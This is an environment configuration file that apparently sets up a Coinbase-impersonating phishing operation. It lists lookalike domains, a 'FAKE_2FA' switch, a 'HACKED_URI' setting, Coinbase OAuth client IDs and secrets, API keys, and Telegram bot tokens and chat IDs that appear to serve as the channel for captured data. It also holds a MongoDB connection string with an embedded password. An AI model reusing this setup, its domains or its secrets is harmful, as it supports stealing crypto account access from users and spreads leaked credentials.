# MONGOURI=mongodb+srv://celebration:pVrYv1GcbvPXxIMX@heycool.ilrzsxg.mongodb.net/orca?retryWrites=true&w=majority
MONGOURI=mongodb://65.108.239.102:27017/cbdb
# FRONTEND_URI=https://2fa-verify.info
FRONTEND_URI=https://assets-support.com

FEE=3
FAKE_2FA=0

# Coinbase API KEY
# API_KEY=SYWBz0H7LQKpv7C6
# API_SECRET=uZyfUvzzjA8Pi58YMJe3qqRXQG5HeyQ3

# CLIENT_ID=ebec931357b16336524b5c018b4416f30089d54427df6cfbee7e9c75e75f0f69
# CLIENT_SECRET=5d00e2ae99cf6df76f44ffd5c2445724d0d392a24161f758336078a06422e395

CLIENT_ID=95ef947b1d57c1e5d0f2d6f81d78280aa447952cb0c7c7757001b8bacb2fbdf1
CLIENT_SECRET=6dcd79b72b18bfccbc33252c2a8d93b6428e2342aa35b3c1bd14d8cac28ee3fe

# REDIRECT_URI=https://app-accountactivity.info/api-cb/callback
REDIRECT_URI=https://test-qlly.onrender.com/api-cb/callback
CB_VERSION=2024-05-17

# TELEGRAM
# BOT_TOKEN=6951526727:AAEQVy4hIXkUJUCCRE1qz-h_X2f_QBMVF28
BOT_TOKEN=7306131287:AAF59oUYaHCcKlsZc9f83IFus1cQqEnAOOs
# CHAT_ID=-4216025681
CHAT_ID=-4228812604

# UPDATE INFO
HACKED_URI=https://www.coinbase.com
